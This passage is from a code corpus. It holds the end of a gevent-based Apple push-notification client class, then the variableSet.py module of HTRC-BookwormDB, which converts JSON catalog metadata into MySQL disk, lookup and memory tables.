if self._feedback_greenlet is None:
self._feedback_greenlet = gevent.spawn(self.save_err,
self._feedback_loop)
return self._feedback_queue.get(
block=block,
timeout=timeout)
def stop(self, timeout=10.0):
"""
Send all pending messages, close connection.
Returns True if no message left to sent. False if dirty.
- timeout: seconds to wait for sending remaining messages. disconnect
immediately if None.
"""
if (self._send_greenlet is not None) and \
(self._send_queue.qsize() > 0):
self.wait_send(timeout=timeout)
if self._send_greenlet is not None:
gevent.kill(self._send_greenlet)
self._send_greenlet = None
if self._error_greenlet is not None:
gevent.kill(self._error_greenlet)
self._error_greenlet = None
if self._feedback_greenlet is not None:
gevent.kill(self._feedback_greenlet)
self._feedback_greenlet = None
return self._send_queue.qsize() < 1
def wait_send(self, timeout=None):
self._send_queue_cleared.clear()
return self._send_queue_cleared.wait(timeout=timeout)
def error_sending_notification(self, notification):
if self._push_connection is not None:
self._push_connection.close()
self._push_connection = None
logger.exception("Error while pushing")
self._send_queue.put(notification)
gevent.sleep(self.timeout)
# approaching Fibonacci series
timeout = int(round(float(self.timeout) * 1.6))
self.timeout = min(timeout, MAX_TIMEOUT)
def send_notification(self, notification):
self._check_send_connection()
logger.debug('Sending APNS notification')
self._push_connection.send(notification.pack())
def save_err(self, func, *args, **kwargs):
try:
func(*args, **kwargs)
except Exception as e:
self.last_err = e
raise
def get_last_error(self):
return self.last_err
| 35.369863 | 78 | 0.587529 | 7,418 | 0.957656 | 0 | 0 | 0 | 0 | 0 | 0 | 968 | 0.124968 |
eac64b9c80cf64eae73e29632228de6d1a1f6dce | 36,295 | py | Python | bookworm/variableSet.py | organisciak/HTRC-BookwormDB | bc24080d6443f8da38255e19149431c9e5b182ab | [
"MIT"
] | null | null | null | bookworm/variableSet.py | organisciak/HTRC-BookwormDB | bc24080d6443f8da38255e19149431c9e5b182ab | [
"MIT"
] | null | null | null | bookworm/variableSet.py | organisciak/HTRC-BookwormDB | bc24080d6443f8da38255e19149431c9e5b182ab | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
import warnings
import json
import os
import decimal
import re
from MySQLdb import escape_string
def to_unicode(obj, encoding='utf-8'):
    """Coerce *obj* to a unicode/text string.

    Byte strings are decoded with *encoding*; ints, floats and Decimals are
    rendered as text; anything else (including values that are already text,
    None, or lists) is returned unchanged.

    The original implementation used the Python-2-only names ``basestring``
    and ``unicode`` and therefore raised NameError under Python 3; this
    version behaves identically on Python 2 but also runs on Python 3.
    """
    if isinstance(obj, bytes):
        # Py2 `str` is an alias of `bytes`, so this matches the old
        # "basestring but not unicode" branch exactly.
        return obj.decode(encoding)
    if isinstance(obj, (int, float, decimal.Decimal)):
        # u'%s' yields a unicode string on Py2 and a str on Py3.
        return u'%s' % obj
    return obj
def splitMySQLcode(string):
    """Split a multi-statement MySQL string into single executable statements.

    MySQL code can only be executed one command at a time, and fails on empty
    statements, so the input is split on ';' and only fragments containing at
    least one word character are kept, each re-terminated with ';\\n'.
    Returns an empty list when the field is empty (e.g. None).
    """
    try:
        fragments = string.split(';')
    except AttributeError:
        # Occurs when the field is completely empty (no .split method).
        return []
    statements = []
    for fragment in fragments:
        if re.search(r"\w", fragment):
            statements.append('%s;\n' % fragment)
    return statements
class textids(dict):
    """
    Maps file locations (arbitrary-length strings) to compact integer bookids.

    The mapping is persisted under files/texts/textids/ so that ids already
    assigned stay valid across runs: on construction every existing id file
    is read back in, and new ids are only ever handed out through bump(),
    which appends to files/texts/textids/new as well as updating this dict.
    Call close() at the end so the append handle is flushed to disk.
    """

    def __init__(self):
        # BUGFIX: the original called subprocess.call(['mkdir', ...]) without
        # ever importing subprocess; the resulting NameError was silently
        # swallowed and the directory was never created, so a fresh checkout
        # crashed on the os.listdir below. os is already imported.
        try:
            os.makedirs("files/texts/textids")
        except OSError:
            pass  # directory already exists
        filelists = os.listdir("files/texts/textids")
        numbers = [0]
        for filelist in filelists:
            with open("files/texts/textids/%s" % filelist) as idfile:
                for line in idfile:
                    parts = line.replace('\n', '').split("\t")
                    self[parts[1]] = int(parts[0])
                    numbers.append(int(parts[0]))
        # Append handle for persisting newly assigned ids.
        self.new = open('files/texts/textids/new', 'a')
        self.max = max(numbers)

    def bump(self, newFileName):
        """Assign the next integer id to newFileName, persist it, return it."""
        self.max = self.max + 1
        writing = self.new
        writing.write('%s\t%s\n' % (str(self.max), newFileName.encode('utf-8')))
        self[newFileName] = self.max
        return self.max

    def close(self):
        """Close the append handle so pending id writes reach disk."""
        self.new.close()
def guessBasedOnNameAndContents(metadataname, dictionary):
    """
    Guess a Bookworm field description from a field's name and an observed
    {value: count} dictionary.

    Everything defaults to a unique categorical character field; the guess
    is refined from the key type (integer keys -> "integer"), the field
    name ("date"/"time" names become time fields, "searchstring" is
    special-cased), and the average number of entries per value (heavily
    repeated values read better as categories than as times).
    """
    description = {"field": metadataname, "datatype": "categorical", "type": "character", "unique": True}
    if dictionary:
        # next(iter(...)) replaces the Python-2-only dictionary.keys()[0].
        example = next(iter(dictionary))
        if isinstance(example, int):
            description["type"] = "integer"
        if isinstance(example, list):
            # BUGFIX: the original line read `unique(example)==False`, a
            # no-op comparison (and a NameError if ever evaluated); the
            # intent was to mark multi-valued fields as non-unique.
            description["unique"] = False
    if metadataname == "searchstring":
        return {"datatype": "searchstring", "field": "searchstring", "unique": True, "type": "text"}
    if re.search("date", metadataname) or re.search("time", metadataname):
        description["datatype"] = "time"
    if dictionary:
        # Guarded so an empty sample no longer divides by zero.
        values = list(dictionary.values())
        averageNumberOfEntries = sum(values) / len(values)
        if averageNumberOfEntries > 2:
            description["datatype"] = "categorical"
    return description
class dataField:
    """
    This defines a class that supports a data field from a json definition.
    We'll use this to spit out appropriate SQL code and JSON where needed.
    The 'definition' here means the user-generated array (submitted in json
    but parsed out before this) described in the Bookworm interface.
    This knows whether it's unique, whether it should treat itself as a
    date, etc.

    The complicated bits are about allowing fast lookups for
    arbitrary-length character fields: for a variable like "country," it
    will also create the new field "country__id" and the table
    "countryLookup" to allow faster joins on the main database.
    """

    def __init__(self, definition, dbToPutIn, anchorType="MEDIUMINT UNSIGNED", anchor="bookid", table="catalog", fasttab="fastcat"):
        # anchorType should be derived from somewhere.
        self.anchorType = anchorType
        self.anchor = anchor
        # Copy every key of the json definition (field, datatype, type,
        # unique, ...) straight onto the instance. Plain dict iteration
        # replaces the Python-2-only iterkeys().
        for key in definition:
            setattr(self, key, definition[key])
        self.dbToPutIn = dbToPutIn
        # Ordinarily, a column has no alias other than itself.
        self.alias = self.field
        self.status = "hidden"
        # The table it's stored in will be either 'catalog', or a new table
        # named after the variable. For now, at least. (Later the anchor
        # should get used.)
        self.fastField = self.field
        self.finalTable = fasttab
        if self.datatype == "categorical":
            self.type = "character"
            # This will catch a common sort of mistake (calling it text),
            # but also coerce any categorical data to fewer than 255
            # characters. Worth it b/c a more-than-255-character field will
            # take *forever* to build.
            self.fastField = "%s__id" % self.field
            self.alias = self.fastField
            # If it's a categorical variable, it will be found in a lookup table.
            self.finalTable = self.field + "Lookup"
            self.status = "public"
        if self.datatype == "time":
            self.status = "public"
        if self.unique:
            self.table = table
            self.fasttab = fasttab
        else:
            self.table = self.field + "Disk"
            self.fasttab = self.field + "heap"
        # Flat file where variableSet.writeMetadata() dumps this field's values.
        self.outputloc = "files/metadata/%s.txt" % self.field

    def slowSQL(self, withIndex=False):
        """
        Return a column-definition fragment like " author VARCHAR(255)",
        optionally followed by index definitions.
        """
        mysqltypes = {
            "character": "VARCHAR(255)",
            "integer": "INT",
            "text": "VARCHAR(5000)",
            "decimal": "DECIMAL (9,4)"
        }
        # Indexing both the field and against the anchor for fast memory table creation.
        indexstring = ", INDEX (%(field)s), INDEX (%(anchor)s, %(field)s " % self.__dict__
        # Need a fixed prefix length on text indexes
        # (http://dev.mysql.com/doc/refman/5.0/en/create-index.html):
        # curtail at 255 characters or indexes start timing out or eating
        # all the memory.
        indextypes = {
            "character": "%s)" % indexstring,
            "integer": "%s)" % indexstring,
            "text": "%s (255) )" % indexstring,
            "decimal": "%s)" % indexstring
        }
        createstring = " %s %s" % (self.field, mysqltypes[self.type])
        if withIndex and self.type != 'text':
            return '%s%s' % (createstring, indextypes[self.type])
        return createstring

    def fastSQL(self):
        """
        Column definition for the in-memory table, or None for types that
        don't belong there. Assumes the disk tables already exist. Memory
        tables in MySQL don't support VARCHAR efficiently (they pad to the
        full width), so character fields are stored as integer ids instead.
        """
        if self.datatype != 'etc':
            if self.type == "character":
                self.setIntType()
                return " %(field)s__id %(intType)s" % self.__dict__
            if self.type == "integer":
                return " %s INT" % self.field
            if self.type == "decimal":
                return " %s DECIMAL (9,4) " % self.field
            else:
                return None
        else:
            return None

    def buildDiskTable(self, fileLocation="default"):
        """
        Builds a disk table for a nonunique variable and bulk-loads its
        metadata file into it.
        """
        db = self.dbToPutIn
        dfield = self
        if fileLocation == "default":
            fileLocation = "files/metadata/" + dfield.field + ".txt"
        print("Making a SQL table to hold the data for " + dfield.field)
        q1 = """DROP TABLE IF EXISTS """ + dfield.field + "Disk"
        db.query(q1)
        db.query("""CREATE TABLE IF NOT EXISTS """ + dfield.field + """Disk (
        """ + self.anchor + " " + self.anchorType + """,
        """ + dfield.slowSQL(withIndex=True) + """
        );""")
        # Keys disabled during LOAD DATA for speed, re-enabled after.
        db.query("ALTER TABLE " + dfield.field + "Disk DISABLE KEYS;")
        loadcode = """LOAD DATA LOCAL INFILE '""" + fileLocation + """'
                   INTO TABLE """ + dfield.field + """Disk
                   FIELDS ESCAPED BY '';"""
        db.query(loadcode)
        db.query("ALTER TABLE " + dfield.field + "Disk ENABLE KEYS")

    def buildIDTable(self):
        """Run the (multi-statement) id-crosswalk DDL one statement at a time."""
        IDcode = self.buildIdTable()
        for query in splitMySQLcode(IDcode):
            self.dbToPutIn.query(query)

    def buildLookupTable(self):
        """Create the integer id crosswalk plus its fast in-memory copy."""
        dfield = self
        lookupCode = dfield.buildIdTable()
        lookupCode = lookupCode + dfield.fastSQLTable()
        for query in splitMySQLcode(lookupCode):
            dfield.dbToPutIn.query(query)

    def fastLookupTableIfNecessary(self, engine="MEMORY"):
        """
        Use the already-created ID table to build the code for an in-memory
        id->string lookup table; returns "" for non-categorical fields.
        """
        self.engine = engine
        if self.datatype == 'categorical':
            self.setIntType()
            # Size the VARCHAR to the longest stored value (at least 1).
            self.maxlength = self.dbToPutIn.query("SELECT MAX(CHAR_LENGTH(%(field)s)) FROM %(field)s__id" % self.__dict__)
            self.maxlength = self.maxlength.fetchall()[0][0]
            self.maxlength = max([self.maxlength, 1])
            return ("""DROP TABLE IF EXISTS tmp;
            CREATE TABLE tmp (%(field)s__id %(intType)s ,PRIMARY KEY (%(field)s__id),
            %(field)s VARCHAR (%(maxlength)s) ) ENGINE=%(engine)s
            SELECT %(field)s__id,%(field)s FROM %(field)s__id;
            DROP TABLE IF EXISTS %(field)sLookup;
            RENAME TABLE tmp to %(field)sLookup;
            """ % self.__dict__)
        return ""

    def fastSQLTable(self, engine="MEMORY"):
        """
        SQL to (re)build the in-memory anchor->id table for a nonunique
        categorical field. Setting engine to another value will create
        these tables on disk instead.
        """
        returnt = ""
        self.engine = engine
        if self.unique and self.anchor == "bookid":
            pass  # when it has to be part of a larger set
        if not self.unique and self.datatype == 'categorical':
            self.setIntType()
            returnt = returnt + """## Creating the memory storage table for %(field)s
            DROP TABLE IF EXISTS tmp;
            CREATE TABLE tmp (%(anchor)s %(anchorType)s , INDEX (%(anchor)s),%(field)s__id %(intType)s ) ENGINE=%(engine)s;
            INSERT INTO tmp SELECT %(anchor)s ,%(field)s__id FROM %(field)s__id JOIN %(field)sDisk USING (%(field)s);
            DROP TABLE IF EXISTS %(field)sheap;
            RENAME TABLE tmp TO %(field)sheap;
            """ % self.__dict__
        if self.datatype == 'categorical' and self.unique:
            pass
        return returnt

    def jsonDict(self):
        """
        DEPRECATED: builds the JSON dictionary loaded into an outside
        bookworm's "options.json" file. Newer versions load this directly
        from the database instead; kept only for backward compatibility.
        """
        mydict = dict()
        # Confusingly named: "type" is the key for the real name ("time",
        # "categorical" in the json), but also the mysql key
        # ('character','integer') elsewhere in this class.
        mydict['type'] = self.datatype
        mydict['dbfield'] = self.field
        try:
            mydict['name'] = self.name
        except AttributeError:
            mydict['name'] = self.field
        if self.datatype == "etc" or self.type == "text":
            # Some things don't go into the fast settings because they'd
            # take too long.
            return dict()
        if self.datatype == "time":
            mydict['unit'] = self.field
            # Default to the full min and max date ranges; times may not be
            # zero or negative.
            cursor = self.dbToPutIn.query("SELECT MIN(" + self.field + "), MAX(" + self.field + ") FROM catalog WHERE " + self.field + " > 0 ")
            results = cursor.fetchall()[0]
            mydict['range'] = [results[0], results[1]]
            mydict['initial'] = [results[0], results[1]]
        if self.datatype == "categorical":
            mydict['dbfield'] = self.field + "__id"
            # Pull every value used more than 20 times and make it json-usable.
            cursor = self.dbToPutIn.query("SELECT %(field)s, %(field)s__id FROM %(field)s__id WHERE %(field)s__count > 20 ORDER BY %(field)s__id ASC LIMIT 500;" % self.__dict__)
            sort_order = []
            descriptions = dict()
            for row in cursor.fetchall():
                code = row[1]
                name = row[0]
                code = to_unicode(code)
                sort_order.append(code)
                descriptions[code] = dict()
                # Three slightly different things: the english name, the
                # database code for that name, and the short display name.
                # Lookup files for these would be worthwhile; for now they
                # are what they are and can be improved by hand.
                descriptions[code]["dbcode"] = code
                descriptions[code]["name"] = name
                descriptions[code]["shortname"] = name
            mydict["categorical"] = {"descriptions": descriptions, "sort_order": sort_order}
        return mydict

    def setIntType(self):
        """
        Choose the smallest unsigned MySQL integer type that can hold every
        distinct value of this field; cached on self.intType after the
        first call.
        """
        try:
            alreadyExists = self.intType
        except AttributeError:
            cursor = self.dbToPutIn.query("SELECT count(DISTINCT " + self.field + ") FROM " + self.table)
            self.nCategories = cursor.fetchall()[0][0]
            self.intType = "INT UNSIGNED"
            if self.nCategories <= 16777215:
                self.intType = "MEDIUMINT UNSIGNED"
            if self.nCategories <= 65535:
                self.intType = "SMALLINT UNSIGNED"
            if self.nCategories <= 255:
                self.intType = "TINYINT UNSIGNED"

    def buildIdTable(self):
        """
        Build an integer crosswalk ID table storing categorical values in
        the fewest bytes possible. Important because grouping on wide
        VARCHARs is slow: on one server a GROUP BY over a 12-byte VARCHAR
        took 5.5 seconds where the equivalent 3-byte MEDIUMINT took 2.2 on
        the same data — and that sort of query appears multiple times in
        every Bookworm search. It also saves memory-table space.
        """
        # Figure out how long the ID field must be first; joins and groups
        # are slower the wider the grouping field.
        self.setIntType()
        returnt = "DROP TABLE IF EXISTS tmp;\n\n"
        returnt += "CREATE TABLE tmp ENGINE=MYISAM SELECT %(field)s,count(*) as count FROM %(table)s GROUP BY %(field)s;\n\n" % self.__dict__
        returnt += """CREATE TABLE IF NOT EXISTS %(field)s__id (
        %(field)s__id %(intType)s PRIMARY KEY AUTO_INCREMENT,
        %(field)s VARCHAR (255), INDEX (%(field)s), %(field)s__count MEDIUMINT);\n\n""" % self.__dict__
        returnt += """INSERT INTO %(field)s__id (%(field)s,%(field)s__count)
        SELECT %(field)s,count FROM tmp LEFT JOIN %(field)s__id USING (%(field)s) WHERE %(field)s__id.%(field)s__id IS NULL
        ORDER BY count DESC;\n\n""" % self.__dict__
        returnt += """DROP TABLE tmp;\n\n"""
        self.idCode = "%s__id" % self.field
        return returnt

    def updateVariableDescriptionTable(self):
        """
        Register this field (and, for categoricals, its lookup table) in
        the masterVariableTable / masterTableTable bookkeeping tables.
        """
        self.memoryCode = self.fastLookupTableIfNecessary()
        code = """INSERT IGNORE INTO masterVariableTable
        (dbname, name, type, tablename, anchor, alias, status,description)
        VALUES
        ('%(field)s','%(field)s','%(type)s','%(finalTable)s','%(anchor)s','%(alias)s','%(status)s','') """ % self.__dict__
        self.dbToPutIn.query(code)
        if not self.unique:
            code = self.fastSQLTable()
            try:
                # NOTE(review): dataField instances never set
                # self.fastAnchor, so this normally raises AttributeError
                # and falls through to "fastcat" — confirm intent.
                parentTab = self.dbToPutIn.query("""
                SELECT tablename FROM masterVariableTable
                WHERE dbname='%s'""" % self.fastAnchor).fetchall()[0][0]
            except Exception:
                parentTab = "fastcat"
            # BUGFIX: the original wrote `'...;' % self.field + "heap"`;
            # since % binds tighter than +, "heap" was appended *after* the
            # closing quote and semicolon, producing malformed SQL like
            #   DELETE ... tablename="author";heap
            # instead of matching the "authorheap" table.
            self.dbToPutIn.query('DELETE FROM masterTableTable WHERE masterTableTable.tablename="%s";' % (self.field + "heap"))
            self.dbToPutIn.query("INSERT IGNORE INTO masterTableTable VALUES ('%s','%s','%s')" % (self.field + "heap", parentTab, escape_string(code)))
        if self.datatype == "categorical":
            # Variable info.
            code = """
            INSERT IGNORE INTO masterVariableTable
            (dbname, name, type, tablename,
            anchor, alias, status,description)
            VALUES
            ('%(field)s__id','%(field)s','lookup','%(fasttab)s',
            '%(anchor)s','%(alias)s','hidden','') """ % self.__dict__
            self.dbToPutIn.query(code)
            # Separate table info.
            code = self.fastLookupTableIfNecessary()
            self.dbToPutIn.query('DELETE FROM masterTableTable WHERE masterTableTable.tablename="%s";' % (self.field + "Lookup"))
            self.dbToPutIn.query("INSERT IGNORE INTO masterTableTable VALUES ('%s','%s','%s')" % (self.field + "Lookup", self.fasttab, escape_string(code)))
# Words that cannot be used as bare MySQL identifiers, so cannot serve as
# Bookworm field names (variableSet checks candidate names against this,
# upper-cased). Taken from the MySQL reserved-word documentation.
# BUGFIX: two entries in the original carried footnote markers copied from
# the source document ("MASTER_HEARTBEAT_PERIOD[c]", "SLOW[d]"); those
# strings could never match a real field name and have been corrected to
# the bare keywords.
mySQLreservedWords = set([
    "ACCESSIBLE", "ADD", "ALL", "ALTER", "ANALYZE", "AND", "AS", "ASC",
    "ASENSITIVE", "BEFORE", "BETWEEN", "BIGINT", "BINARY", "BLOB", "BOTH",
    "BY", "CALL", "CASCADE", "CASE", "CHANGE", "CHAR", "CHARACTER", "CHECK",
    "COLLATE", "COLUMN", "CONDITION", "CONSTRAINT", "CONTINUE", "CONVERT",
    "CREATE", "CROSS", "CURRENT_DATE", "CURRENT_TIME", "CURRENT_TIMESTAMP",
    "CURRENT_USER", "CURSOR", "DATABASE", "DATABASES", "DAY_HOUR",
    "DAY_MICROSECOND", "DAY_MINUTE", "DAY_SECOND", "DEC", "DECIMAL",
    "DECLARE", "DEFAULT", "DELAYED", "DELETE", "DESC", "DESCRIBE",
    "DETERMINISTIC", "DISTINCT", "DISTINCTROW", "DIV", "DOUBLE", "DROP",
    "DUAL", "EACH", "ELSE", "ELSEIF", "ENCLOSED", "ESCAPED", "EXISTS",
    "EXIT", "EXPLAIN", "FALSE", "FETCH", "FLOAT", "FLOAT4", "FLOAT8", "FOR",
    "FORCE", "FOREIGN", "FROM", "FULLTEXT", "GENERAL", "GRANT", "GROUP",
    "HAVING", "HIGH_PRIORITY", "HOUR_MICROSECOND", "HOUR_MINUTE",
    "HOUR_SECOND", "IF", "IGNORE", "IGNORE_SERVER_IDS", "IN", "INDEX",
    "INFILE", "INNER", "INOUT", "INSENSITIVE", "INSERT", "INT", "INT1",
    "INT2", "INT3", "INT4", "INT8", "INTEGER", "INTERVAL", "INTO", "IS",
    "ITERATE", "JOIN", "KEY", "KEYS", "KILL", "LEADING", "LEAVE", "LEFT",
    "LIKE", "LIMIT", "LINEAR", "LINES", "LOAD", "LOCALTIME",
    "LOCALTIMESTAMP", "LOCK", "LONG", "LONGBLOB", "LONGTEXT", "LOOP",
    "LOW_PRIORITY", "MASTER_HEARTBEAT_PERIOD",
    "MASTER_SSL_VERIFY_SERVER_CERT", "MATCH", "MAXVALUE", "MEDIUMBLOB",
    "MEDIUMINT", "MEDIUMTEXT", "MIDDLEINT", "MINUTE_MICROSECOND",
    "MINUTE_SECOND", "MOD", "MODIFIES", "NATURAL", "NOT",
    "NO_WRITE_TO_BINLOG", "NULL", "NUMERIC", "ON", "OPTIMIZE", "OPTION",
    "OPTIONALLY", "OR", "ORDER", "OUT", "OUTER", "OUTFILE", "PRECISION",
    "PRIMARY", "PROCEDURE", "PURGE", "RANGE", "READ", "READS", "READ_WRITE",
    "REAL", "REFERENCES", "REGEXP", "RELEASE", "RENAME", "REPEAT", "REPLACE",
    "REQUIRE", "RESIGNAL", "RESTRICT", "RETURN", "REVOKE", "RIGHT", "RLIKE",
    "SCHEMA", "SCHEMAS", "SECOND_MICROSECOND", "SELECT", "SENSITIVE",
    "SEPARATOR", "SET", "SHOW", "SIGNAL", "SLOW", "SMALLINT", "SPATIAL",
    "SPECIFIC", "SQL", "SQLEXCEPTION", "SQLSTATE", "SQLWARNING",
    "SQL_BIG_RESULT", "SQL_CALC_FOUND_ROWS", "SQL_SMALL_RESULT", "SSL",
    "STARTING", "STRAIGHT_JOIN", "TABLE", "TERMINATED", "THEN", "TINYBLOB",
    "TINYINT", "TINYTEXT", "TO", "TRAILING", "TRIGGER", "TRUE", "UNDO",
    "UNION", "UNIQUE", "UNLOCK", "UNSIGNED", "UPDATE", "USAGE", "USE",
    "USING", "UTC_DATE", "UTC_TIME", "UTC_TIMESTAMP", "VALUES", "VARBINARY",
    "VARCHAR", "VARCHARACTER", "VARYING", "WHEN", "WHERE", "WHILE", "WITH",
    "WRITE", "XOR", "YEAR_MONTH", "ZEROFILL"])
class variableSet:
    """
    The collection of dataField objects derived from one metadata file
    (by default files/metadata/jsoncatalog_derived.txt) plus an optional
    field_descriptions json definition. Knows how to write the metadata out
    to tab-separated flat files and to bulk-load those files into MySQL.
    """
    def __init__(self,
                 originFile="files/metadata/jsoncatalog_derived.txt",
                 anchorField="bookid",
                 jsonDefinition=None,
                 db=None):
        self.db = db
        self.dbname = db.dbname
        self.anchorField = anchorField
        self.originFile = originFile
        self.jsonDefinition = jsonDefinition
        if jsonDefinition == None:
            # Make a guess, why not?
            warnings.warn("""No field_descriptions file specified, so guessing based on variable names.
            Unintended consequences are possible""")
            self.jsonDefinition = self.guessAtFieldDescriptions()
        else:
            # jsonDefinition is a path to a json file when supplied.
            self.jsonDefinition = json.loads(open(jsonDefinition, "r").read())
        self.setTableNames()
        self.catalogLocation = "files/metadata/" + self.tableName + ".txt"
        self.variables = []
        for item in self.jsonDefinition:
            # The anchor field has special methods hard coded in.
            if item['field'] == self.anchorField:
                continue
            if item['field'].upper() in mySQLreservedWords:
                warnings.warn(item['field'] + """ is a reserved word in MySQL, so can't be used as a Bookworm field name: skipping it for now, but you probably want to rename it to something different""")
                item['field'] = item['field'] + "___"
                # NOTE(review): the rename above is immediately discarded by
                # this `continue`; reserved-word fields are skipped entirely.
                continue
            self.variables.append(dataField(item, self.db, anchor=anchorField, table=self.tableName, fasttab=self.fastName))

    def setTableNames(self):
        """
        For the base case, they're catalog and fastcat: otherwise, it's
        just the key and the first variable associated with it.
        """
        if self.originFile == "files/metadata/jsoncatalog_derived.txt":
            self.tableName = "catalog"
            self.fastName = "fastcat"
        else:
            try:
                self.tableName = self.jsonDefinition[0]['field'] + "_" + self.jsonDefinition[1]['field']
            except IndexError:
                # If it's only one element long, just name it after the variable itself.
                self.tableName = self.jsonDefinition[0]['field']
            self.fastName = self.tableName + "heap"

    def guessAtFieldDescriptions(self, stopAfter=30000):
        """
        Infer a field_descriptions structure by sampling up to *stopAfter*
        lines of the origin file, counting value occurrences per field, and
        handing each count dictionary to guessBasedOnNameAndContents.
        """
        allMyKeys = dict()
        i = 1
        # NOTE(review): `unique` is tracked for the whole sample, so a
        # list-valued value in *any* field marks *every* field non-unique
        # — confirm that is intended.
        unique = True
        for line in open(self.originFile):
            i += 1
            entry = json.loads(line)
            for key in entry:
                if type(entry[key]) == list:
                    unique = False
                else:
                    # Treat it for counting sake as a single element list.
                    entry[key] = [entry[key]]
                for value in entry[key]:
                    try:
                        allMyKeys[key][value] += 1
                    except KeyError:
                        try:
                            allMyKeys[key][value] = 1
                        except KeyError:
                            allMyKeys[key] = dict()
                            allMyKeys[key][value] = 1
            if i > stopAfter:
                break
        myOutput = []
        for metadata in allMyKeys:
            bestGuess = guessBasedOnNameAndContents(metadata, allMyKeys[metadata])
            if unique == False:
                bestGuess['unique'] = False
            myOutput.append(bestGuess)
        # "filename" is handled specially elsewhere, so drop it here.
        myOutput = [output for output in myOutput if output["field"] != "filename"]
        return myOutput

    def uniques(self):
        """The fields stored directly on the catalog (one value per text)."""
        return [variable for variable in self.variables if variable.unique]

    def notUniques(self):
        """The multi-valued fields, each stored in its own Disk table."""
        return [variable for variable in self.variables if not variable.unique]

    def anchorLookupDictionary(self):
        """
        Return a dict-like object mapping raw anchor values to the compact
        integer codes used in the fast tables. Also sets self.fastAnchor
        as a side effect, which loadMetadata/writeMetadata rely on.
        """
        db = self.db
        anchor = self.anchorField
        self.fastAnchor = self.anchorField
        if anchor == "bookid" or anchor == "filename":
            self.fastAnchor = "bookid"
            # File-backed persistent filename -> bookid mapping.
            bookids = textids()
            for variable in self.variables:
                variable.anchor = self.fastAnchor
        else:
            # NOTE(review): `query` below is built but never executed; the
            # db.query call that follows repeats the same statement.
            query = """SELECT alias FROM masterVariableTable WHERE dbname='%s'""" % (anchor)
            bookids = dict()
            cursor = db.query("SELECT alias FROM masterVariableTable WHERE dbname = '%s'" % anchor)
            try:
                fastAnchor = cursor.fetchall()[0][0]
            except:
                if anchor in ["bookid", "filename"]:
                    fastAnchor = "bookid"
                print anchor + "\n\n"
            self.fastAnchor = fastAnchor
            if fastAnchor != anchor:
                # Load the anchor's existing Lookup table into memory.
                results = db.query("SELECT * FROM %sLookup;" % (anchor))
                for row in results.fetchall():
                    bookids[row[1]] = row[0]
                self.anchor = fastAnchor
                for variable in self.variables:
                    variable.anchor = fastAnchor
            else:
                # Construct a phony dictionary that just returns what you gave.
                bookids = selfDictionary()
        return bookids

    def writeMetadata(self, limit=float("Inf")):
        """
        Write out all the metadata into tab-separated files that MySQL is
        able to read in with LOAD DATA INFILE. General purpose, with a few
        special cases for the primary use case where this is the "catalog"
        table holding the primary lookup information.
        """
        linenum = 1
        variables = self.variables
        bookids = self.anchorLookupDictionary()
        metadatafile = open(self.originFile)
        # Open files for writing to.
        catalog = open(self.catalogLocation, 'w')
        for variable in [variable for variable in variables if not variable.unique]:
            variable.output = open(variable.outputloc, 'w')
        for entry in metadatafile:
            try:
                #entry = to_unicode(entry)
                #entry = entry.replace('\\n', ' ')
                entry = json.loads(entry)
            except:
                warnings.warn("""WARNING: json parsing failed for this JSON line:
                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n""" + entry)
                continue
            # We always lead with the bookid and the filename.
            # Unicode characters in filenames may cause problems?
            # NOTE(review): this permanently rewrites self.anchorField on
            # the first iteration — confirm later callers expect that.
            if self.anchorField == "bookid":
                self.anchorField = "filename"
            filename = to_unicode(entry[self.anchorField])
            try:
                bookid = bookids[entry[self.anchorField]]
            except KeyError:
                if self.tableName == "catalog":
                    # Mint a new persistent id for a never-seen file.
                    bookid = bookids.bump(entry[self.anchorField])
                else:
                    # If the key isn't in the name table, we have no use for this entry.
                    continue
            mainfields = [str(bookid), to_unicode(entry[self.anchorField])]
            if self.tableName != "catalog":
                # It can get problematic to have them both, so we're just
                # writing over the anchorField here.
                mainfields = [str(bookid)]
            # First, pull the unique variables and write them to the 'catalog' table.
            for var in [variable for variable in variables if variable.unique]:
                if var.field not in [self.anchorField, self.fastAnchor]:
                    myfield = entry.get(var.field, "")
                    if myfield is None:
                        myfield = ''
                    mainfields.append(to_unicode(myfield))
            catalogtext = '%s\n' % '\t'.join(mainfields)
            catalog.write(catalogtext.encode('utf-8'))
            for variable in [variable for variable in variables if not variable.unique]:
                # Each of these has a different file it must write to...
                outfile = variable.output
                lines = entry.get(variable.field, [])
                if isinstance(lines, basestring):
                    """
                    Allow a single element to be represented as a string
                    """
                    lines = [lines]
                if lines == None:
                    lines = []
                for line in lines:
                    try:
                        writing = '%s\t%s\n' % (str(bookid), line)
                        outfile.write(writing.encode('utf-8'))
                    except:
                        warnings.warn("some sort of error with bookid no. " + str(bookid) + ": " + json.dumps(lines))
                        pass
            if linenum > limit:
                break
            linenum = linenum + 1
        for variable in [variable for variable in variables if not variable.unique]:
            variable.output.close()
        try:
            bookids.close()
        except AttributeError:
            # When it's a pure dictionary, not the weird textfile hybrid.
            pass
        catalog.close()

    def loadMetadata(self):
        """
        Load in the metadata files which have already been created
        elsewhere (by writeMetadata).
        """
        # Called for the side effect of assigning self.fastAnchor.
        bookwormcodes = self.anchorLookupDictionary()
        db = self.db
        print "Making a SQL table to hold the catalog data"
        if self.tableName == "catalog":
            """A few necessary basic fields"""
            mysqlfields = ["bookid MEDIUMINT UNSIGNED, PRIMARY KEY(bookid)", "filename VARCHAR(255)", "nwords INT"]
        else:
            mysqlfields = ["%s MEDIUMINT UNSIGNED, PRIMARY KEY (%s)" % (self.fastAnchor, self.fastAnchor)]
        for variable in self.uniques():
            createstring = variable.slowSQL(withIndex=True)
            mysqlfields.append(createstring)
        if len(mysqlfields) > 1:
            # This creates the main (slow) catalog table.
            db.query("""DROP TABLE IF EXISTS %s """ % self.tableName)
            createcode = """CREATE TABLE IF NOT EXISTS %s (
            """ % self.tableName + ",\n".join(mysqlfields) + ") ENGINE=MYISAM;"
            db.query(createcode)
            # Never have keys enabled before a LOAD DATA INFILE.
            db.query("ALTER TABLE %s DISABLE KEYS" % self.tableName)
            print "loading data into %s using LOAD DATA LOCAL INFILE..." % self.tableName
            anchorFields = self.fastAnchor
            if self.tableName == "catalog":
                anchorFields = "bookid,filename"
            loadEntries = {
                "catLoc": self.catalogLocation,
                "tabName": self.tableName,
                "anchorFields": anchorFields,
                "loadingFields": anchorFields + "," + ','.join([field.field for field in self.variables if field.unique])
            }
